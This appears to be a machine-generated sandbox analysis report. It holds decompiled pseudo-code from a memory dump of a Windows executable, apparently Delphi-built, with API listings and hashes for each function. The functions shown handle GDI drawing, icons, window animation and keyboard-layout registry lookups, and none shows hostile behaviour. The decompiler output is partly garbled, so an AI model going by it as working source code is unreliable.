                                                                        				if(__edx == 0) {
                                                                        					E00412BA4(0, _t113, 0, __edi, __esi);
                                                                        					E00412BA4(1,  &_v12, 1, __edi, __esi);
                                                                        					SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                        					SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                        					_t53 = E00435FF4(_t97);
                                                                        					_t55 = E00435FB0(_t97);
                                                                        					SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
                                                                        					_t60 = E00435FF4(_t97);
                                                                        					_t63 = E00435FB0(_t97);
                                                                        					return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
                                                                        				}
                                                                        				E00412BA4(E00412BA4(E00435FB0(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
                                                                        				SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                        				SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                        				_t82 = E00435FF4(_t97);
                                                                        				_t84 = E00435FB0(_t97);
                                                                        				SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
                                                                        				_t89 = E00435FF4(_t97);
                                                                        				_t92 = E00435FB0(_t97);
                                                                        				return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
                                                                        			}



















                                                                        APIs
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DC75
                                                                        • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DC92
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCB5
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCE0
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DD16
                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045DD33
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD56
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ModeViewport
                                                                        • String ID:
                                                                        • API String ID: 3149394475-0
                                                                        • Opcode ID: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction ID: 8f84e7b93b444426f7dca1db73b7397be018fa4546cd3fd7a1a3ea71a0fadf7e
                                                                        • Opcode Fuzzy Hash: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction Fuzzy Hash: B6313E707083006BD640FF7A8C96B4B629C9F44308F40593E7959DF297CA3DE8454769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 26%
                                                                        			E00421068(void* __ebx) {
                                                                        				intOrPtr _v8;
                                                                        				char _v1000;
                                                                        				char _v1004;
                                                                        				char _v1032;
                                                                        				signed int _v1034;
                                                                        				short _v1036;
                                                                        				void* _t24;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr _t29;
                                                                        				intOrPtr _t45;
                                                                        				intOrPtr _t52;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        
                                                                        				_t54 = _t55;
                                                                        				_v1036 = 0x300;
                                                                        				_v1034 = 0x10;
                                                                        				_t25 = E004029BC(_t24, 0x40,  &_v1032);
                                                                        				_push(0);
                                                                        				L00406EB4();
                                                                        				_v8 = _t25;
                                                                        				_push(_t54);
                                                                        				_push(0x421165);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t55 + 0xfffffbf8;
                                                                        				_push(0x68);
                                                                        				_t27 = _v8;
                                                                        				_push(_t27);
                                                                        				L00406B8C();
                                                                        				_t45 = _t27;
                                                                        				if(_t45 >= 0x10) {
                                                                        					_push( &_v1032);
                                                                        					_push(8);
                                                                        					_push(0);
                                                                        					_push(_v8);
                                                                        					L00406BCC();
                                                                        					if(_v1004 != 0xc0c0c0) {
                                                                        						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                        						_push(8);
                                                                        						_push(_t45 - 8);
                                                                        						_push(_v8);
                                                                        						L00406BCC();
                                                                        					} else {
                                                                        						_push( &_v1004);
                                                                        						_push(1);
                                                                        						_push(_t45 - 8);
                                                                        						_push(_v8);
                                                                        						L00406BCC();
                                                                        						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                        						_push(7);
                                                                        						_push(_t45 - 7);
                                                                        						_push(_v8);
                                                                        						L00406BCC();
                                                                        						_push( &_v1000);
                                                                        						_push(1);
                                                                        						_push(7);
                                                                        						_push(_v8);
                                                                        						L00406BCC();
                                                                        					}
                                                                        				}
                                                                        				_pop(_t52);
                                                                        				 *[fs:eax] = _t52;
                                                                        				_push(E0042116C);
                                                                        				_t29 = _v8;
                                                                        				_push(_t29);
                                                                        				_push(0);
                                                                        				L00407124();
                                                                        				return _t29;
                                                                        			}


















                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00421096
                                                                        • 72E7AD70.GDI32(?,00000068,00000000,00421165,?,00000000), ref: 004210B2
                                                                        • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 004210D1
                                                                        • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 004210F5
                                                                        • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421165), ref: 00421113
                                                                        • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00421127
                                                                        • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 00421147
                                                                        • 72E7B380.USER32(00000000,?,0042116C,00421165,?,00000000), ref: 0042115F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        • Opcode ID: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction ID: f0e1a453716523f1c9eecebf53a0f2200f9152a329f4876d0861d21903a57afc
                                                                        • Opcode Fuzzy Hash: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction Fuzzy Hash: 8B2183F5A00218AADB10DBA5CD85FAE77BCEB08704F5104A6F708F71C1D679AF548B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00421658() {
                                                                        				struct HINSTANCE__* _t145;
                                                                        				long _t166;
                                                                        				intOrPtr _t167;
                                                                        				intOrPtr _t186;
                                                                        				void* _t192;
                                                                        				BYTE* _t193;
                                                                        				BYTE* _t196;
                                                                        				intOrPtr _t197;
                                                                        				void* _t198;
                                                                        				intOrPtr _t199;
                                                                        
                                                                        				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                                                        				 *((intOrPtr*)(_t198 - 0x20)) = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                                                        				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                                                        				if(_t192 > 0) {
                                                                        					_t197 = 1;
                                                                        					do {
                                                                        						_t167 = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                                                        						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214D8( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                                                        							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                                                        							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                                                        						}
                                                                        						_t197 = _t197 + 1;
                                                                        						_t192 = _t192 - 1;
                                                                        						_t204 = _t192;
                                                                        					} while (_t192 != 0);
                                                                        				}
                                                                        				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                                                        				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                                                        				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                                                        				 *((intOrPtr*)(_t198 - 0x2c)) = E004083E8(( *(_t198 - 0x40))[8], _t204);
                                                                        				 *[fs:eax] = _t199;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x42183f, _t198);
                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
                                                                        				E00421310( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                                                        				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                                                        				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                                                        				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                                                        				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                                                        				 *(_t198 - 0x30) = E004083E8( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                                                        				_push(_t198);
                                                                        				_push(0x42181c);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t199;
                                                                        				_t193 =  *(_t198 - 0x30);
                                                                        				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                                                        				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                                                        				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                                                        				DeleteObject( *(_t198 - 0x34));
                                                                        				DeleteObject( *(_t198 - 0x38));
                                                                        				_t145 =  *0x496714; // 0x400000
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                                                        					E00420A80(_t166);
                                                                        				}
                                                                        				_pop(_t186);
                                                                        				 *[fs:eax] = _t186;
                                                                        				_push(E00421823);
                                                                        				return E00402774( *(_t198 - 0x30));
                                                                        			}














                                                                        APIs
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0042174A
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00421759
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217AA
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217B8
                                                                        • DeleteObject.GDI32(?), ref: 004217C1
                                                                        • DeleteObject.GDI32(?), ref: 004217CA
                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                        • String ID:
                                                                        • API String ID: 1030595962-0
                                                                        • Opcode ID: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction ID: 013013fe9648ae5886e4b8230851134a27cb4e01da0e6262b179e60b3c39ad5f
                                                                        • Opcode Fuzzy Hash: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction Fuzzy Hash: ED611875A00229AFCB00EFA9D881E9EBBF9FF48304B554466F804EB361D734AD51CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00475338(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v28;
                                                                        				void* _v32;
                                                                        				struct tagPOINT _v40;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				signed char _t60;
                                                                        				struct HWND__* _t61;
                                                                        				void* _t64;
                                                                        				void* _t66;
                                                                        				struct HWND__* _t73;
                                                                        				signed short _t80;
                                                                        				void* _t89;
                                                                        				int _t93;
                                                                        				long _t106;
                                                                        				intOrPtr* _t112;
                                                                        				intOrPtr _t123;
                                                                        				intOrPtr _t124;
                                                                        				void* _t132;
                                                                        				signed char* _t141;
                                                                        				void* _t144;
                                                                        				void* _t145;
                                                                        				struct HWND__* _t148;
                                                                        				void* _t152;
                                                                        
                                                                        				_v16 = 0;
                                                                        				_t144 = __edx;
                                                                        				_t112 = __eax;
                                                                        				_push(_t152);
                                                                        				_push(0x475537);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t152 + 0xffffffdc;
                                                                        				E0043AFDC(__eax, 0, __edx, __eflags);
                                                                        				if(E00475568(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
                                                                        					L22:
                                                                        					_pop(_t123);
                                                                        					 *[fs:eax] = _t123;
                                                                        					_push(0x47553e);
                                                                        					return E00404348( &_v16);
                                                                        				} else {
                                                                        					_t124 =  *((intOrPtr*)(_t144 + 8));
                                                                        					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
                                                                        					if(_t55 == 0) {
                                                                        						 *((char*)(_t112 + 0x295)) = 1;
                                                                        						goto L22;
                                                                        					}
                                                                        					_t56 = _t55 - 4;
                                                                        					if(_t56 == 0) {
                                                                        						_t57 = _t124;
                                                                        						_t141 =  *(_t124 + 0x14);
                                                                        						__eflags =  *_t141 & 0x00000001;
                                                                        						if(( *_t141 & 0x00000001) != 0) {
                                                                        							_t145 = E00477D88(_t112,  *((intOrPtr*)(_t57 + 0xc)));
                                                                        							_t60 =  *(_t145 + 0x18);
                                                                        							__eflags = _t60 - _t141[4];
                                                                        							if(_t60 < _t141[4]) {
                                                                        								_t61 =  *(_t145 + 0x14);
                                                                        								__eflags = _t61;
                                                                        								if(_t61 > 0) {
                                                                        									__eflags = _t61 - _t141[4];
                                                                        									if(_t61 <= _t141[4]) {
                                                                        										_t141[4] = _t61;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								_t141[4] = _t60;
                                                                        							}
                                                                        							E00472AA4(_t145, _t141[4]);
                                                                        						}
                                                                        					} else {
                                                                        						_t64 = _t56 - 2;
                                                                        						if(_t64 == 0) {
                                                                        							_t66 = E00477D88(_t112,  *((intOrPtr*)(_t124 + 0xc)));
                                                                        							E00472AA4(_t66, E00426D20(E0043CC2C(_t112),  *((intOrPtr*)(_t124 + 0xc))));
                                                                        							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								 *((intOrPtr*)( *_t112 + 0x7c))();
                                                                        							}
                                                                        						} else {
                                                                        							if(_t64 == 0x12c) {
                                                                        								_push(E004072A4(GetMessagePos()) & 0x0000ffff);
                                                                        								_t80 = GetMessagePos();
                                                                        								_pop(_t132);
                                                                        								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
                                                                        								E004360F0(_t112,  &_v40,  &_v12);
                                                                        								_push(_v40.y);
                                                                        								_t148 = ChildWindowFromPoint(E0043CC2C(_t112), _v40.x);
                                                                        								__eflags = _t148;
                                                                        								if(_t148 != 0) {
                                                                        									_t89 = E0043CC2C(_t112);
                                                                        									__eflags = _t148 - _t89;
                                                                        									if(_t148 != _t89) {
                                                                        										E00404984( &_v16, 0x50);
                                                                        										_t93 = E00404600(_v16);
                                                                        										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
                                                                        										E00404744(_v16, "SysHeader32");
                                                                        										if(__eflags == 0) {
                                                                        											E004360F0(_t112,  &_v40,  &_v12);
                                                                        											_v32 = _v40;
                                                                        											_v28 = _v40.y;
                                                                        											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
                                                                        											__eflags = _t106;
                                                                        											if(_t106 >= 0) {
                                                                        												E00477D88(_t112, _v20);
                                                                        												E004037D8(_t112, __eflags);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        			}





























                                                                        0x00475495
                                                                        0x004754a3
                                                                        0x004754ab
                                                                        0x004754c5
                                                                        0x004754d2
                                                                        0x004754d7
                                                                        0x004754e1
                                                                        0x004754e9
                                                                        0x004754ef
                                                                        0x004754fe
                                                                        0x00475503
                                                                        0x00475505
                                                                        0x0047550c
                                                                        0x0047551c
                                                                        0x0047551c
                                                                        0x00475505
                                                                        0x004754d7
                                                                        0x00475495
                                                                        0x00475486
                                                                        0x0047539f
                                                                        0x00475398
                                                                        0x00000000
                                                                        0x00475393

                                                                        APIs
                                                                        • GetMessagePos.USER32 ref: 00475443
                                                                        • GetMessagePos.USER32 ref: 00475451
                                                                        • ChildWindowFromPoint.USER32 ref: 0047547D
                                                                        • GetClassNameA.USER32(00000000,00000000,00000000), ref: 004754BB
                                                                        • SendMessageA.USER32 ref: 004754FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Message$ChildClassFromNamePointSendWindow
                                                                        • String ID: SysHeader32
                                                                        • API String ID: 2510305242-2725536604
                                                                        • Opcode ID: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction ID: 9da0523838ad94a5aacdfd7dfe65334668b87c58a187b1523fb11523a5177e66
                                                                        • Opcode Fuzzy Hash: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction Fuzzy Hash: FA517F70B009056BCB10EF79D9819EEB3E5AF48304B50C17AB819EB356DB7CED058798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0043E178(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr* _v8;
                                                                        				void _v12;
                                                                        				intOrPtr _v16;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				intOrPtr _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t85;
                                                                        				void* _t113;
                                                                        				intOrPtr _t129;
                                                                        				intOrPtr _t138;
                                                                        				void* _t141;
                                                                        
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t113 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t138 =  *0x495c2c; // 0x496c08
                                                                        				 *((char*)(_v8 + 0x210)) = 1;
                                                                        				_push(_t141);
                                                                        				_push(0x43e33f);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t141 + 0xffffffe0;
                                                                        				E004365DC(_v8, __ecx, __ecx, _t138);
                                                                        				_v16 = _v16 + 4;
                                                                        				E00437804(_v8,  &_v28);
                                                                        				if(E004541C8() <  *(_v8 + 0x4c) + _v24) {
                                                                        					_v24 = E004541C8() -  *(_v8 + 0x4c);
                                                                        				}
                                                                        				if(E004541D4() <  *(_v8 + 0x48) + _v28) {
                                                                        					_v28 = E004541D4() -  *(_v8 + 0x48);
                                                                        				}
                                                                        				if(E004541BC() > _v28) {
                                                                        					_v28 = E004541BC();
                                                                        				}
                                                                        				if(E004541B0() > _v16) {
                                                                        					_v16 = E004541B0();
                                                                        				}
                                                                        				SetWindowPos(E0043CC2C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                        				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x47a8a8 != 0) {
                                                                        					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                        					if(_v12 != 0) {
                                                                        						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                        						if(_v12 == 0) {
                                                                        							E004413CC( &_v36);
                                                                        							if(_v32 <= _v24) {
                                                                        							}
                                                                        						}
                                                                        						 *0x47a8a8(E0043CC2C(_v8), 0x64,  *0x0047A9B0 | 0x00040000);
                                                                        					}
                                                                        				}
                                                                        				ShowWindow(E0043CC2C(_v8), 4);
                                                                        				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                        				_pop(_t129);
                                                                        				 *[fs:eax] = _t129;
                                                                        				_push(0x43e346);
                                                                        				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                        				_t85 = _v8;
                                                                        				 *((char*)(_t85 + 0x210)) = 0;
                                                                        				return _t85;
                                                                        			}
















                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E25D
                                                                        • GetTickCount.KERNEL32 ref: 0043E262
                                                                        • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043E29D
                                                                        • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043E2B5
                                                                        • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043E2FB
                                                                        • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E30C
                                                                        • GetTickCount.KERNEL32 ref: 0043E326
                                                                          • Part of subcall function 004413CC: GetCursorPos.USER32(?), ref: 004413D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                        • String ID:
                                                                        • API String ID: 3024527889-0
                                                                        • Opcode ID: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction ID: 7261888abba92b40dc426993c3f0a1dc2aaa4b26281b0a3ad08c4c814d8d1b3d
                                                                        • Opcode Fuzzy Hash: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction Fuzzy Hash: 9D516474A00105EFDB10EFA9C985A9EB7F5EF49304F2045AAF500EB391D775AE80CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00454414(intOrPtr __eax, void* __ebx) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				char _v20;
                                                                        				void* _v24;
                                                                        				struct HKL__* _v280;
                                                                        				char _v536;
                                                                        				char _v600;
                                                                        				char _v604;
                                                                        				char _v608;
                                                                        				char _v612;
                                                                        				void* _t60;
                                                                        				intOrPtr _t106;
                                                                        				intOrPtr _t111;
                                                                        				void* _t117;
                                                                        				void* _t118;
                                                                        				intOrPtr _t119;
                                                                        
                                                                        				_t117 = _t118;
                                                                        				_t119 = _t118 + 0xfffffda0;
                                                                        				_v612 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t117);
                                                                        				_push(0x4545bf);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t119;
                                                                        				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                        					L11:
                                                                        					_pop(_t106);
                                                                        					 *[fs:eax] = _t106;
                                                                        					_push(0x4545c6);
                                                                        					return E00404348( &_v612);
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
                                                                        					E00404348(_v8 + 0x38);
                                                                        					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                        					if(_t60 < 0) {
                                                                        						L10:
                                                                        						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                        						E00416868( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                        						goto L11;
                                                                        					} else {
                                                                        						_v20 = _t60 + 1;
                                                                        						_v24 =  &_v280;
                                                                        						do {
                                                                        							if(E0044183C( *_v24) == 0) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								_v608 =  *_v24;
                                                                        								_v604 = 0;
                                                                        								if(RegOpenKeyExA(0x80000002, E004092EC( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									_push(_t117);
                                                                        									_push(0x45457b);
                                                                        									_push( *[fs:eax]);
                                                                        									 *[fs:eax] = _t119;
                                                                        									_v12 = 0x100;
                                                                        									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                        										E004045B0( &_v612, 0x100,  &_v536);
                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                        										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                        											E004045B0(_v8 + 0x38, 0x100,  &_v536);
                                                                        										}
                                                                        									}
                                                                        									_pop(_t111);
                                                                        									 *[fs:eax] = _t111;
                                                                        									_push(0x454582);
                                                                        									return RegCloseKey(_v16);
                                                                        								}
                                                                        							}
                                                                        							goto L12;
                                                                        							L9:
                                                                        							_v24 = _v24 + 4;
                                                                        							_t38 =  &_v20;
                                                                        							 *_t38 = _v20 - 1;
                                                                        						} while ( *_t38 != 0);
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        				L12:
                                                                        			}




















                                                                        0x00000000
                                                                        0x00454582
                                                                        0x00454582
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00000000
                                                                        0x00454485
                                                                        0x00454472
                                                                        0x00000000

